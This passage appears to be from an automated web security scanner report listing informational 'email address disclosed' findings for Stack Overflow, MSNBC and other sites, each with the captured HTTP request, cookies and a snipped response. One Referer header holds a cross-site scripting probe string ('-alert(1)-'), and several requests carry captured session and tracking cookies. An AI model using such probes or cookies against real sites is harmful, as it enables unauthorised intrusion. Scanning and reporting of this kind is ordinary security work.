...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.57. http://sstatic.net/openid.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /openid.css

Issue detail

The following email address was disclosed in the response:

Request

GET /openid.css?v=3 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users/login?returnurl=%2fusers
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.58. http://sstatic.net/stackoverflow/all.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /stackoverflow/all.css

Issue detail

The following email address was disclosed in the response:

Request

GET /stackoverflow/all.css?v=90776b57f91f HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.59. http://sstatic.net/stackoverflow/img/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /stackoverflow/img/favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /stackoverflow/img/favicon.ico HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.60. http://stackoverflow.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 15:12:26 GMT
Last-Modified: Sun, 30 Jan 2011 15:11:26 GMT
Vary: *
Date: Sun, 30 Jan 2011 15:11:25 GMT
Content-Length: 194989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Stack Overflow</title>

<link rel="stylesheet" type="text/css
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.61. http://stackoverflow.com/posts/4843433/ivc/3344

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /posts/4843433/ivc/3344

Issue detail

The following email address was disclosed in the response:

Request

GET /posts/4843433/ivc/3344 HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.62. http://stackoverflow.com/questions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /questions

Issue detail

The following email address was disclosed in the response:

Request

GET /questions HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:42 GMT
Content-Length: 51939


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Newest Questions - Stack Overflow</title>

<link rel="stylesh
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.63. http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url

Issue detail

The following email address was disclosed in the response:

Request

GET /questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 15:13:38 GMT
Last-Modified: Sun, 30 Jan 2011 15:12:38 GMT
Vary: *
Date: Sun, 30 Jan 2011 15:12:38 GMT
Content-Length: 32716


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>PHP: Facebook Like box - Being able to like the current page using dyna
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.64. http://stackoverflow.com/tags

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /tags

Issue detail

The following email address was disclosed in the response:

Request

GET /tags HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.2.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:43 GMT
Content-Length: 25906


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Tags - Stack Overflow</title>

<link rel="stylesheet" type="t
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.65. http://stackoverflow.com/users

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /users

Issue detail

The following email address was disclosed in the response:

Request

GET /users HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/tags
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.3.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:47 GMT
Content-Length: 39001


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Users - Stack Overflow</title>

<link rel="stylesheet" type="
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.66. http://stackoverflow.com/users/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /users/login

Issue detail

The following email address was disclosed in the response:

Request

GET /users/login?returnurl=%2fusers HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.4.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: gauthed=; expires=Sat, 29-Jan-2011 15:12:49 GMT; path=/
Date: Sun, 30 Jan 2011 15:12:49 GMT
Content-Length: 14133


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Log In - Stack Overflow</title>

<link rel="stylesheet" type=
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.67. http://stackoverflow.com/users/login/global/request

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /users/login/global/request

Issue detail

The following email address was disclosed in the response:

Request

POST /users/login/global/request HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users/login?returnurl=%2fusers
Origin: http://stackoverflow.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.4.10.1296400348; gauthed=1
Content-Length: 0

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.68. http://technolog.msnbc.redacted/security

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /security

Issue detail

The following email addresses were disclosed in the response:

Request

GET /security HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:40:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132562

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a href="mailto:TSA.OCR-ExternalCompliance@dhs.gov">TSA.OCR-ExternalCompliance@dhs.gov</a>
...[SNIP]...
<a href="mailto:civil.liberties@dhs.gov">civil.liberties@dhs.gov</a>
...[SNIP]...
<a href="mailto:TSAComplaints@eff.org">TSAComplaints@eff.org</a>
...[SNIP]...

26.69. http://technolog.msnbc.redacted/video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /video

Issue detail

The following email address was disclosed in the response:

Request

GET /video HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:39:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129715

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a href="mailto:ideas@hpeprintlive.com">
...[SNIP]...

26.70. http://technolog.msnbc.redacted/viral

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /viral

Issue detail

The following email address was disclosed in the response:

Request

GET /viral HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:38:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154010

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a href="mailto:ideas@hpeprintlive.com">
...[SNIP]...

26.71. http://technolog.msnbc.redacted/youtube

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /youtube

Issue detail

The following email address was disclosed in the response:

Request

GET /youtube HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:34:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147979

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a href="mailto:ideas@hpeprintlive.com">
...[SNIP]...

26.72. http://thelastword.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thelastword.msnbc.redacted
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: thelastword.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:55:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67375

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>The Last Word</title>
<me
...[SNIP]...
<a href="mailto:thelastword@msnbc.com">thelastword@msnbc.com</a>
...[SNIP]...

26.73. http://timheuer.com/blog/articles/getting-started-with-silverlight-development.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timheuer.com
Path:   /blog/articles/getting-started-with-silverlight-development.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /blog/articles/getting-started-with-silverlight-development.aspx HTTP/1.1
Host: timheuer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 390459
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 29 Jan 2011 23:26:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <he
...[SNIP]...
<br />Alex pintoam@hotmail.com
                </div>
...[SNIP]...

26.74. http://today.msnbc.redacted/id/37616868

Summary

Severity:   Information
Confidence:   Certain
Host:   http://today.msnbc.msn.com
Path:   /id/37616868

Issue detail

The following email address was disclosed in the response:

Request

GET /id/37616868 HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=162
Date: Sun, 30 Jan 2011 01:51:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107134


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...

26.75. http://today.msnbc.redacted/id/41319614/ns/today-entertainment/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://today.msnbc.msn.com
Path:   /id/41319614/ns/today-entertainment/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41319614/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=129
Date: Sun, 30 Jan 2011 01:51:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133030


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a class="share" href="mailto:name@address.com?subject=Share%20this%20interactive">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...

26.76. http://wbenedetti.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wbenedetti.newsvine.com
Path:   /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js HTTP/1.1
Host: wbenedetti.newsvine.com
Proxy-Connection: keep-alive
Referer: http://wbenedetti.newsvine.com/?2efa1%22-alert(1)-%22fb67b00e4a1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=45f73cc22cc66ac775a363e022c73cd5

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:20:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Fri, 31 Oct 2008 15:18:25 GMT
ETag: "125c49d-2f1b-45a8e1bcb3240"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:20:53 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Connection: Keep-Alive
Content-Length: 12059

/**
* CPAINT - Cross-Platform Asynchronous INterface Toolkit
*
* http://cpaint.sourceforge.net
*
* released under the terms of the LGPL
* see http://www.fsf.org/licensing/licenses/lgpl.txt for
...[SNIP]...
<wiley14@gmail.com>
...[SNIP]...
<dstender@st-webdevelopment.de>
...[SNIP]...

26.77. http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webreflection.blogspot.com
Path:   /2007/08/global-scope-evaluation-and-dom.html

Issue detail

The following email address was disclosed in the response:

Request

GET /2007/08/global-scope-evaluation-and-dom.html HTTP/1.1
Host: webreflection.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sun, 30 Jan 2011 01:51:56 GMT
Date: Sun, 30 Jan 2011 01:51:56 GMT
Last-Modified: Sat, 29 Jan 2011 16:51:37 GMT
ETag: "68641a2f-a995-496b-a3b0-3a35d5667c34"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

